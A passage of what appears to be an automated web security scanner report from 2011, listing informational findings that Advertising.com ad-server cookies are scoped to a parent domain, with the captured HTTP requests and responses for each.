Set-Cookie: C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 1346633562=_4dc1f67d,1346633562,804145^956559^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=wXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwRwR2XAO; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
F1=BAf9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAMAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
ROLL=boAnr2C+PRAglcGLPJnzdbH!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/cdn/_uac/adpage.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bgd9B3kAAAAA6c1CAEAAgEABAAAABAAAAIAA+CA; BASE=RgwqwyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+G!; ROLL=boAno2C+PRAglcG!; C2=iXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; GUID=MTMwNDU1NzAyNjsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:57:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973503.743206.93306656XMC
Set-Cookie: C2=wXfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIsijGAHCGenBwhQQvaAcI0kmGAHC3mpBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwRwR2XAO; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
Set-Cookie: F1=BAf9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAMAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
Set-Cookie: BASE=RgwqxyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHK!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
Set-Cookie: ROLL=boAnr2C+PRAglcGLPJnzdbH!; domain=advertising.com; expires=Sat, 04-May-2013 00:57:20 GMT; path=/
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:57:20 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1559

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE> </TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=3tpwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
F1=Bc3mC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAIAAgEA; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
BASE=Rgwq8yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrM!; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
ROLL=boAnr2C6PRAgcQG7fBnz6XH!; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
29138469=_4dc29b77,0410804442,743207^956583^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/Android/dailyfinance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDU5OTE0NjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=8ppwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; F1=BwnmC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAEAAgEA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ4I!; ROLL=boAno2C6PRAgcQG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 12:43:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956583.743207.93241795XMC
Set-Cookie: C2=3tpwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
Set-Cookie: F1=Bc3mC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAIAAgEA; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
Set-Cookie: BASE=Rgwq8yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrM!; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
Set-Cookie: ROLL=boAnr2C6PRAgcQG7fBnz6XH!; domain=advertising.com; expires=Sat, 04-May-2013 12:43:35 GMT; path=/
Set-Cookie: 29138469=_4dc29b77,0410804442,743207^956583^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 12:43:35 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735221/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000743207/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=8ppwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
F1=BwnmC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAEAAgEA; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
ROLL=boAno2C6PRAgcQG!; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
55333782=_4dc29a7c,3723375835,743207^894905^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/engadget/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; C2=qppwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYYTY6ACsMihNhAnjaYTIEv9F2E; GUID=MTMwNDU5OTE0NjsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 12:39:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894905.743207.93241795XMC
Set-Cookie: C2=8ppwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
Set-Cookie: F1=BwnmC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAEAAgEA; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
Set-Cookie: ROLL=boAno2C6PRAgcQG!; domain=advertising.com; expires=Sat, 04-May-2013 12:39:25 GMT; path=/
Set-Cookie: 55333782=_4dc29a7c,3723375835,743207^894905^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 12:39:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735225/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000743207/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=YXfwN5pqEIxFGJpovUg3sY0NSKMCItdhWhQ3WXoVIoLOGaFCKGehWhQ3gZoVIMa4FaFCEGehWhAmoZoVIwtlGaFCA9qhWhw2kXoVIsijGaFCGenhWhQQvaoVI0kmGaFC3mphWVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
F1=Bgd9B3kAAAAA6c1CAEAAgEABAAAABAAAAIAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
BASE=RgwqwyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+G!; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
ROLL=boAno2C+PRAglcG!; domain=advertising.com; expires=Sat, 04-May-2013 00:56:56 GMT; path=/
63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
